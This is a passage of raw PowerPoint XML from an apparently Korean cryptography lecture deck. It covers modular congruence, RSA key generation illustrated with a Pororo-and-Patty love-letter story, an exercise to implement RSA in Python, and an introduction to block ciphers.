                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>같은 집합이 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400">
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>나올까</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400">
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" err="1">
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>gcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400">
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>( m, k1 ) = 1 , </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" err="1">
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>gcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400">
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>( m, k2 ) = 1, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" err="1">
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>gcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400">
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>( m, a ) = 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" err="1">
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>일때</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400">
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400">
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>만약  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400">
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>K1 * a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>≡</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400">
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t> K2 * a  (mod m) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400">
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>이라면</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400">
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>, K1  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>≡</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400">
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t> K2   (mod m) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" err="1">
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>이여야</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400">
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t> 함</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400">
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400">
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>또한</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400">
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" err="1">
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>gcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400">
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>( m, K1 * a )  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400">
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>또한 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400">
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400">
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>이 된다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400">
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>. -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400">
                <a:latin typeface="Nanum Gothic"/>
              </a:rPr>
              <a:t>같은 집합 일 수밖에 없음</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="240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a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>현대암호 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>– RSA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>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a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>뽀로로와 패티가 비밀연애를 위해 암호화된 연애편지를 주고 받으려 한다면</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>뽀로로와 패티는</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 서로 다른 두 소수 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(P, Q)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>를 선택한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>와 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Q</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>를 곱해 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>N </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>을 구한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.  (N=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PxQ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>오일러</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 피 함수에 해당되는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>φ(N) = (P-1)(Q-1)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>을 구한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>φ(N) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>보다는 작으면서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>φ(N)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>와 서로소인 정수 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>를 찾는다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.  (1 &lt; e &lt; φ(N)) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>이번 알고리즘에서는</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e = 10001(2) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>로 고정한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>만약</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>와 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>N </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>이 서로소가 아닐 시</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>다시 처음부터 구한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>확장된 유클리드 호제법</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>을 이용해 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(d x e) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="373A3C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t> ≡ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="373A3C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> φ(N) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>을 만족하는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>d </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>를 구한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>처음에 선택한 두 소수 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(P, Q)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>는 유출되면 안되므로 삭제한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>패티도 동일한 과정을 거친다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US">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a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>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/Theory/T5/RSA</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>현대암호 구현 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>– RSA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>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RSA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="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RSA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>python</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> 으로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>구현하시오</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>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RSA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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RSA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"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/Theory/T5/Block</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>현대암호 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>– Block Cipher</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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a:t>Block </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
              <a:t>암호란</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>    -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
              <a:t>평문을</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> 블록 단위로 암호화하는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>대칭키</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> 암호 시스템</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>블록 단위로 암호화를 한다는 의미</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>    -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> 암호화 방식을 정할 때</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>임의의 길이</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
              <a:t>평문에</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> 대해 고민할 필요가 없이 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>고정된 길이의 각 블록을 암호화하는 방식만 정하면 된다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>!</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10340214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/Theory/T5/Block</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>현대암호 </a:t>
